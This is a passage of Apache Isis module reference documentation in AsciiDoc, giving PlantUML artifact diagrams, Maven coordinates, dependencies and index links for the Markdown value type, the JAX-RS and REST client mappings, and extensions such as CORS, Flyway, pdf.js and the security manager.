+\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.ixn.v2.InteractionDtoPanelFactoriesWkt$Standalone +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/ui\/wkt\/IsisModuleValAsciidocUiWkt.adoc[IsisModuleValAsciidocUiWkt]\n****\n|===\n\n=== Markdown\n\n[plantuml,Markdown,svg]\n----\n@startuml(id=Markdown)\ntitle Markdown - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Markdown\\n[Software System]\" {\n rectangle \"==Apache Isis Val - Markdown (MetaModel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Markdown (Persistence)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Markdown (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Markdown (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Val - Markdown (persistence jdo DN5)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Markdown (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Val - Markdown (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n}\n5 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n7 .[#707070].> 8 : \"\"\n@enduml\n----\n.Projects\/Modules (Markdown)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Val - Markdown (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown\nType: pom\nDirectory: \/valuetypes\/markdown\n----\n|Markdown value type.\n\n|Apache Isis Val - Markdown (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-applib\nType: jar\nDirectory: \/valuetypes\/markdown\/applib\n----\n|.Dependencies\n****\ncom.vladsch.flexmark:flexmark-all:jar:${flexmark.version} +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/applib\/IsisModuleValMarkdownApplib.adoc[IsisModuleValMarkdownApplib], xref:refguide:valuetypes:index\/markdown\/applib\/jaxb\/MarkdownJaxbAdapter.adoc[MarkdownJaxbAdapter], xref:refguide:valuetypes:index\/markdown\/applib\/value\/Converter.adoc[Converter]\n****\n\n|Apache Isis Val - Markdown (MetaModel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: 
isis-valuetypes-markdown-metamodel\nType: jar\nDirectory: \/valuetypes\/markdown\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.markdown.metamodel.MarkdownMetaModelRefiner +\no.a.i.valuetypes.markdown.metamodel.MarkdownValueTypeProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/metamodel\/IsisModuleValMarkdownMetaModel.adoc[IsisModuleValMarkdownMetaModel]\n****\n\n|Apache Isis Val - Markdown (Persistence)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-persistence\nType: pom\nDirectory: \/valuetypes\/markdown\/persistence\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Markdown (persistence jdo DN5)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-persistence-jdo-dn5\nType: jar\nDirectory: \/valuetypes\/markdown\/persistence\/jdo-dn5\n----\n|.Dependencies\n****\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.datanucleus:datanucleus-core:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/persistence\/jdo\/dn5\/IsisModuleValMarkdownPersistenceJdoDn5.adoc[IsisModuleValMarkdownPersistenceJdoDn5], xref:refguide:valuetypes:index\/markdown\/persistence\/jdo\/dn5\/converters\/IsisMarkdownConverter.adoc[IsisMarkdownConverter]\n****\n\n|Apache Isis Val - Markdown (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-ui\nType: pom\nDirectory: \/valuetypes\/markdown\/ui\n----\n|.Dependencies\n****\ncom.vladsch.flexmark:flexmark-all:jar:${flexmark.version} +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-markdown-applib:jar:<managed> +\norg.jsoup:jsoup:jar:<managed> +\n****\n\n|Apache Isis Val - Markdown (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-markdown-ui-wkt\nType: jar\nDirectory: \/valuetypes\/markdown\/ui\/wicket\n----\n|.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/markdown\/ui\/wkt\/IsisModuleValMarkdownUiWkt.adoc[IsisModuleValMarkdownUiWkt]\n****\n|===\n\n== Mappings\n\n[plantuml,Mappings,svg]\n----\n@startuml(id=Mappings)\ntitle Mappings - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Mappings\\n[Software System]\" {\n rectangle \"==Apache Isis Mappings\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Mappings)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Mappings\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings\nType: pom\nDirectory: \/mappings\n----\n|Libraries and tools to map one bounded context (usually an Apache Isis application) to some other bounded context (usually\n_not_ an Apache Isis 
application).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n|===\n\n=== JAX-RS Client Library\n\n[plantuml,JAX-RS Client Library,svg]\n----\n@startuml(id=JAX-RS_Client_Library)\ntitle JAX-RS Client Library - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JAX-RS Client Library\\n[Software System]\" {\n rectangle \"==Apache Isis Map - JaxRS Client (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Map - JaxRS Client (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Map - JaxRS Client (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JAX-RS Client Library)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Map - JaxRS Client (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient\nType: pom\nDirectory: \/mappings\/jaxrsclient\n----\n|Integrates JaxRS Client Library\n\n|Apache Isis Map - JaxRS Client (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient-applib\nType: jar\nDirectory: \/mappings\/jaxrsclient\/applib\n----\n|.Dependencies\n****\njavax:javaee-api:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/jaxrsclient\/applib\/IsisModuleExtJaxRsClientApplib.adoc[IsisModuleExtJaxRsClientApplib], xref:refguide:extensions:index\/jaxrsclient\/applib\/client\/JaxRsClient.adoc[JaxRsClient], xref:refguide:extensions:index\/jaxrsclient\/applib\/client\/JaxRsResponse.adoc[JaxRsResponse]\n****\n\n|Apache Isis Map - JaxRS Client (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-jaxrsclient-impl\nType: jar\nDirectory: \/mappings\/jaxrsclient\/testlib\n----\n|.Dependencies\n****\norg.apache.isis.mappings:isis-mappings-jaxrsclient-applib:jar:<managed> +\n****\n|===\n\n=== REST Client\n\n[plantuml,REST Client,svg]\n----\n@startuml(id=REST_Client)\ntitle REST Client - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"REST Client\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - REST Client (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - REST Client (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (REST Client)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Ext - REST Client (parent)\n[source,yaml]\n----\nGroup: 
org.apache.isis.mappings\nArtifact: isis-mappings-restclient\nType: pom\nDirectory: \/mappings\/restclient\n----\n|A client for the Restful Objects Viewer\n\n|Apache Isis Ext - REST Client (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.mappings\nArtifact: isis-mappings-restclient-applib\nType: jar\nDirectory: \/mappings\/restclient\/applib\n----\n|A client for the Restful Objects Viewer\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/restclient\/ActionParameterListBuilder.adoc[ActionParameterListBuilder], xref:refguide:extensions:index\/restclient\/IsisModuleExtRestClient.adoc[IsisModuleExtRestClient], xref:refguide:extensions:index\/restclient\/ResponseDigest.adoc[ResponseDigest], xref:refguide:extensions:index\/restclient\/RestfulClient.adoc[RestfulClient], xref:refguide:extensions:index\/restclient\/RestfulClientConfig.adoc[RestfulClientConfig], xref:refguide:extensions:index\/restclient\/RestfulClientException.adoc[RestfulClientException], xref:refguide:extensions:index\/restclient\/auth\/BasicAuthFilter.adoc[BasicAuthFilter], xref:refguide:extensions:index\/restclient\/log\/ClientConversationFilter.adoc[ClientConversationFilter], xref:refguide:extensions:index\/restclient\/log\/ClientConversationLogger.adoc[ClientConversationLogger]\n****\n|===\n\n== Extensions\n\n[plantuml,Extensions,svg]\n----\n@startuml(id=Extensions)\ntitle Extensions - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<11>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<22>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<23>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<12>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<24>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<13>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<14>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<15>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<16>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<17>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<18>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<19>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor 
#2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<20>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<21>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<10>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Extensions\\n[Software System]\" {\n rectangle \"==Apache Isis Ext - CORS (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Ext - CORS (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Ext - Flyway\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Ext - Flyway Impl\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Ext - Sec Man\\n<size:10>[Container: packaging: pom]<\/size>\" <<16>> as 16\n rectangle \"==Apache Isis Ext - Sec Man API\\n<size:10>[Container: packaging: jar]<\/size>\" <<17>> as 17\n rectangle \"==Apache Isis Ext - Sec Man Encryption (Using jbcrypt)\\n<size:10>[Container: packaging: jar]<\/size>\" <<18>> as 18\n rectangle \"==Apache Isis Ext - Sec Man Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<19>> as 19\n rectangle \"==Apache Isis Ext - Sec Man Persistence (Using JDO)\\n<size:10>[Container: packaging: jar]<\/size>\" <<20>> as 20\n rectangle \"==Apache Isis Ext - Sec Man Persistence (Using JPA)\\n<size:10>[Container: packaging: jar]<\/size>\" <<21>> as 21\n rectangle \"==Apache Isis Ext - Sec Man Realm (Using Shiro)\\n<size:10>[Container: packaging: jar]<\/size>\" <<22>> as 22\n rectangle \"==Apache Isis Ext - Security - Shiro LDAP Realm (impl)\\n<size:10>[Container: packaging: jar]<\/size>\" <<24>> as 24\n rectangle \"==Apache Isis Ext - Security - Shiro LDAP Realm (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<23>> as 23\n rectangle \"==Apache Isis Ext - Wicket Viewer - Excel Download (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Ext - Wicket Viewer - Excel Download (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<10>> as 10\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Ext - Wicket Viewer - fullcalendar (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<11>> as 11\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<13>> as 13\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<14>> as 14\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<12>> as 12\n rectangle \"==Apache Isis Ext - Wicket Viewer - pdf.js (ui)\\n<size:10>[Container: packaging: jar]<\/size>\" <<15>> as 15\n rectangle \"==Apache Isis Extensions\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n3 .[#707070].> 4 : \"\"\n7 .[#707070].> 8 : \"\"\n16 .[#707070].> 17 : \"\"\n16 .[#707070].> 18 : \"\"\n16 .[#707070].> 19 : \"\"\n16 .[#707070].> 20 : \"\"\n16 .[#707070].> 21 : \"\"\n16 .[#707070].> 22 : 
\"\"\n23 .[#707070].> 24 : \"\"\n5 .[#707070].> 6 : \"\"\n9 .[#707070].> 10 : \"\"\n9 .[#707070].> 11 : \"\"\n12 .[#707070].> 13 : \"\"\n12 .[#707070].> 14 : \"\"\n12 .[#707070].> 15 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 16 : \"\"\n2 .[#707070].> 23 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 9 : \"\"\n2 .[#707070].> 12 : \"\"\n@enduml\n----\n.Projects\/Modules (Extensions)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Extensions\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions\nType: pom\nDirectory: \/extensions\n----\n|Extensions to the Apache Isis framework itself.\nThese are _not_ intended to be called by the domain logic of an Apache Isis application (see instead org.apache.isis.platform).\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Ext - CORS (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-cors\nType: pom\nDirectory: \/extensions\/vro\/cors\n----\n|Implementation of CORS Filter (using ebay filter)\n\n|Apache Isis Ext - CORS (impl)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-cors-impl\nType: jar\nDirectory: \/extensions\/vro\/cors\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/cors\/impl\/IsisModuleExtCorsImpl.adoc[IsisModuleExtCorsImpl]\n****\n\n|Apache Isis Ext - Wicket Viewer - Excel Download (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-exceldownload\nType: pom\nDirectory: \/extensions\/vw\/exceldownload\n----\n|A component for Apache Isis' Wicket viewer, providing an alternative representation of collections to be downloaded as an Excel spreadsheet.\n\n|Apache Isis Ext - Wicket Viewer - Excel Download (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-exceldownload-ui\nType: jar\nDirectory: \/extensions\/vw\/exceldownload\/ui\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.exceldownload.ui.components.CollectionContentsAsExcelFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.apache.poi:poi-ooxml:jar:<managed> +\norg.apache.poi:poi-ooxml-schemas:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/IsisModuleExtExcelDownloadUi.adoc[IsisModuleExtExcelDownloadUi], xref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/components\/CollectionContentsAsExcel.adoc[CollectionContentsAsExcel], xref:refguide:extensions:index\/viewer\/wicket\/exceldownload\/ui\/components\/CollectionContentsAsExcelFactory.adoc[CollectionContentsAsExcelFactory]\n****\n\n|Apache Isis Ext - Flyway\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-flyway\nType: pom\nDirectory: \/extensions\/core\/flyway\n----\n|Integrates Flyway when using any (relational) persistence store\n\n|Apache Isis Ext - Flyway Impl\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-flyway-impl\nType: jar\nDirectory: \/extensions\/core\/flyway\/impl\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-config:jar:<managed> 
+\norg.flywaydb:flyway-core:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\norg.springframework:spring-jdbc:jar:<managed> +\norg.springframework.boot:spring-boot-autoconfigure:jar:<managed> +\n****\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar\nType: pom\nDirectory: \/extensions\/vw\/fullcalendar\n----\n|A component for Apache Isis' Wicket viewer, displaying collections of date-bearing objects on a fullcalendar.io calendar (a JavaScript widget).\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar-applib\nType: jar\nDirectory: \/extensions\/vw\/fullcalendar\/applib\n----\n|.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/fullcalendar\/applib\/CalendarEventable.adoc[CalendarEventable], xref:refguide:extensions:index\/fullcalendar\/applib\/Calendarable.adoc[Calendarable], xref:refguide:extensions:index\/fullcalendar\/applib\/IsisModuleExtFullCalendarApplib.adoc[IsisModuleExtFullCalendarApplib], xref:refguide:extensions:index\/fullcalendar\/applib\/spi\/CalendarableDereferencingService.adoc[CalendarableDereferencingService], xref:refguide:extensions:index\/fullcalendar\/applib\/value\/CalendarEvent.adoc[CalendarEvent]\n****\n\n|Apache Isis Ext - Wicket Viewer - fullcalendar (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-fullcalendar-ui\nType: jar\nDirectory: \/extensions\/vw\/fullcalendar\/ui\n----\n|.Dependencies\n****\nnet.ftlines.wicket-fullcalendar:wicket-fullcalendar-core:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-fullcalendar-applib:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/fullcalendar\/ui\/component\/IsisModuleExtFullCalendarUi.adoc[IsisModuleExtFullCalendarUi]\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs\nType: pom\nDirectory: \/extensions\/vw\/pdfjs\n----\n|A component for Apache Isis' Wicket viewer, allowing BLOBs containing PDFs to be rendered in a panel using pdf.js.\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-applib\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/applib\n----\n|.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/annotations\/PdfJsViewer.adoc[PdfJsViewer], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/config\/PdfJsConfig.adoc[PdfJsConfig], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/config\/Scale.adoc[Scale], xref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/applib\/spi\/PdfJsViewerAdvisor.adoc[PdfJsViewerAdvisor]\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-metamodel\nType: jar\nDirectory: 
\/extensions\/vw\/pdfjs\/metamodel\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.pdfjs.metamodel.facet.PdfJsViewerFacetFromAnnotationFactory$Register +\n****\n\n.Dependencies\n****\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.extensions:isis-extensions-pdfjs-applib:jar:<managed> +\n****\n\n|Apache Isis Ext - Wicket Viewer - pdf.js (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-pdfjs-ui\nType: jar\nDirectory: \/extensions\/vw\/pdfjs\/ui\n----\n|.Components\n****\no.a.i.extensions.viewer.wicket.pdfjs.ui.components.PdfJsViewerPanelComponentFactory +\n****\n\n.Dependencies\n****\norg.apache.isis.extensions:isis-extensions-pdfjs-metamodel:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/viewer\/wicket\/pdfjs\/ui\/IsisModuleExtPdfjsUi.adoc[IsisModuleExtPdfjsUi]\n****\n\n|Apache Isis Ext - Sec Man\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman\nType: pom\nDirectory: \/extensions\/security\/secman\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-security:jar:<managed> +\n****\n\n|Apache Isis Ext - Sec Man API\n[source,yaml]\n----\nGroup: org.apache.isis.extensions\nArtifact: isis-extensions-secman-api\nType: jar\nDirectory: \/extensions\/security\/secman\/api\n----\n|.Components\n****\no.a.i.extensions.secman.api.authorizor.AuthorizorSecman +\n****\n\n.Document Index Entries\n****\nxref:refguide:extensions:index\/secman\/api\/IsisModuleExtSecmanApi.adoc[IsisModuleExtSecmanApi], xref:refguide:extensions:index\/secman\/api\/SecmanConfiguration.adoc[SecmanConfiguration], xref:refguide:extensions:index\/secman\/api\/SecurityRealm.adoc[SecurityRealm], xref:refguide:extensions:index\/secman\/api\/SecurityRealmCharacteristic.adoc[SecurityRealmCharacteristic], xref:refguide:extensions:index\/secman\/api\/SecurityRealmService.adoc[SecurityRealmService], xref:refguide:extensions:index\/secman\/api\/authorizor\/AuthorizorSecman.adoc[AuthorizorSecman], xref:refguide:extensions:index\/secman\/api\/encryption\/PasswordEncryptionService.adoc[PasswordEncryptionService], xref:refguide:extensions:index\/secman\/api\/encryption\/PasswordEncryptionServiceNone.adoc[PasswordEncryptionServiceNone], xref:refguide:extensions:index\/secman\/api\/events\/UserCreatedEvent.adoc[UserCreatedEvent], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermission.adoc[ApplicationPermission], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionMode.adoc[ApplicationPermissionMode], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionRepository.adoc[ApplicationPermissionRepository], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionRule.adoc[ApplicationPermissionRule], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionValue.adoc[ApplicationPermissionValue], xref:refguide:extensions:index\/secman\/api\/permission\/ApplicationPermissionValueSet.adoc[ApplicationPermissionValueSet], 